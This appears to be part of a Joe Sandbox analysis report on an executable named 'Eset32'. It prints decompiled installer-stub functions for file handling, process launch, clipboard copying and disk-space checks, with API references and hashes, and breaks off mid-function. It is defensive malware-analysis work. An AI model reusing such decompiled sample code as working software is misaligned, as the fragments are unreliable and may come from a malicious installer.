                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 543 405761-40576f CreateDirectoryA 544 405771-405773 543->544 545 405775 GetLastError 543->545 546 40577b 544->546 545->546
                                                          C-Code - Quality: 100%
                                                          			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                          0x00405767
                                                          0x0040576f
                                                          0x00000000
                                                          0x00405775
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405d0c
                                                          0x00405d1c
                                                          0x00405d24
                                                          0x00000000
                                                          0x00405d2b
                                                          0x00000000
                                                          0x00405d2d

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405d3b
                                                          0x00405d4b
                                                          0x00405d53
                                                          0x00000000
                                                          0x00405d5a
                                                          0x00000000
                                                          0x00405d5c

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                          0x0040330e
                                                          0x00403314

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E00401F7B() {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402BCE(_t14);
				E0040521E(0xffffffeb, _t6);
				_t8 = E00405796(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
						_t12 = E00406575(_t16, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406055(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                          0x00401f81
                                                          0x00401f86
                                                          0x00401f8c
                                                          0x00401f91
                                                          0x00401f95
                                                          0x004027bf
                                                          0x00401f9b
                                                          0x00401f9e
                                                          0x00401fa1
                                                          0x00401fa9
                                                          0x00401fb6
                                                          0x00401fb8
                                                          0x00401fb8
                                                          0x00401fab
                                                          0x00401fad
                                                          0x00401fad
                                                          0x00401fa9
                                                          0x00401fbf
                                                          0x00401fc0
                                                          0x00401fc0
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                            • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                            • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                            • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                            • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                          • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                          • Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                          • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403830 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403830() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403875();
				return E004058BF(_t6, 0x436800, 7);
			}





                                                          0x00403830
                                                          0x00403838
                                                          0x0040383b
                                                          0x00403841
                                                          0x00403841
                                                          0x00403841
                                                          0x00403848
                                                          0x00403859

                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                          • Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
                                                          • Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                          • Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                          0x00405362
                                                          0x0040536a
                                                          0x0040536d
                                                          0x00405375
                                                          0x00405378
                                                          0x00405507
                                                          0x0040550d
                                                          0x00405531
                                                          0x00405531
                                                          0x0040553d
                                                          0x00405543
                                                          0x00405565
                                                          0x00405565
                                                          0x0040556b
                                                          0x004055c0
                                                          0x004055c0
                                                          0x004055c3
                                                          0x00000000
                                                          0x00000000
                                                          0x004055c5
                                                          0x004055c8
                                                          0x004055cb
                                                          0x00000000
                                                          0x00000000
                                                          0x004055d5
                                                          0x004055db
                                                          0x004055dd
                                                          0x004055e0
                                                          0x004056dd
                                                          0x00000000
                                                          0x004056dd
                                                          0x004055ef
                                                          0x004055fb
                                                          0x00405604
                                                          0x0040560b
                                                          0x0040560f
                                                          0x00405612
                                                          0x0040561b
                                                          0x00405621
                                                          0x00405624
                                                          0x00405624
                                                          0x00405634
                                                          0x0040563a
                                                          0x0040563d
                                                          0x00405648
                                                          0x00405648
                                                          0x00405649
                                                          0x0040564c
                                                          0x00405653
                                                          0x0040565a
                                                          0x00405662
                                                          0x00405662
                                                          0x00405670
                                                          0x00405676
                                                          0x00405679
                                                          0x00405679
                                                          0x00405680
                                                          0x00405686
                                                          0x0040568f
                                                          0x00405696
                                                          0x0040569f
                                                          0x004056a1
                                                          0x004056a4
                                                          0x004056b3
                                                          0x004056b5
                                                          0x004056b8
                                                          0x004056b9
                                                          0x004056bc
                                                          0x004056bd
                                                          0x004056be
                                                          0x004056be
                                                          0x004056c6
                                                          0x004056d1
                                                          0x004056d7
                                                          0x004056d7
                                                          0x00000000
                                                          0x0040563d
                                                          0x0040556d
                                                          0x00405573
                                                          0x004055a1
                                                          0x004055a3
                                                          0x004055a9
                                                          0x004055b4
                                                          0x004055b4
                                                          0x004055bb
                                                          0x00000000
                                                          0x004055bb
                                                          0x00405577
                                                          0x00405581
                                                          0x00000000
                                                          0x00405545
                                                          0x00405545
                                                          0x0040554b
                                                          0x00405586
                                                          0x00000000
                                                          0x0040558d
                                                          0x00405554
                                                          0x0040555b
                                                          0x00405560
                                                          0x00000000
                                                          0x00405560
                                                          0x00405543
                                                          0x0040537e
                                                          0x00405382
                                                          0x0040538a
                                                          0x0040538e
                                                          0x00405391
                                                          0x00405394
                                                          0x00405397
                                                          0x0040539a
                                                          0x0040539b
                                                          0x0040539c
                                                          0x004053b5
                                                          0x004053b8
                                                          0x004053c2
                                                          0x004053d1
                                                          0x004053d9
                                                          0x004053e1
                                                          0x004053e6
                                                          0x004053e9
                                                          0x004053f5
                                                          0x004053fe
                                                          0x00405407
                                                          0x00405429
                                                          0x0040542f
                                                          0x00405440
                                                          0x00405445
                                                          0x00405453
                                                          0x00405461
                                                          0x00405461
                                                          0x00405466
                                                          0x00405474
                                                          0x00405474
                                                          0x00405479
                                                          0x0040547c
                                                          0x00405481
                                                          0x0040548d
                                                          0x00405496
                                                          0x004054a3
                                                          0x004054b2
                                                          0x004054a5
                                                          0x004054aa
                                                          0x004054aa
                                                          0x004054be
                                                          0x004054be
                                                          0x004054d2
                                                          0x004054db
                                                          0x004054e4
                                                          0x004054f4
                                                          0x00405500
                                                          0x00405500
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                          • Opcode Fuzzy Hash: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040460D Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 274stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
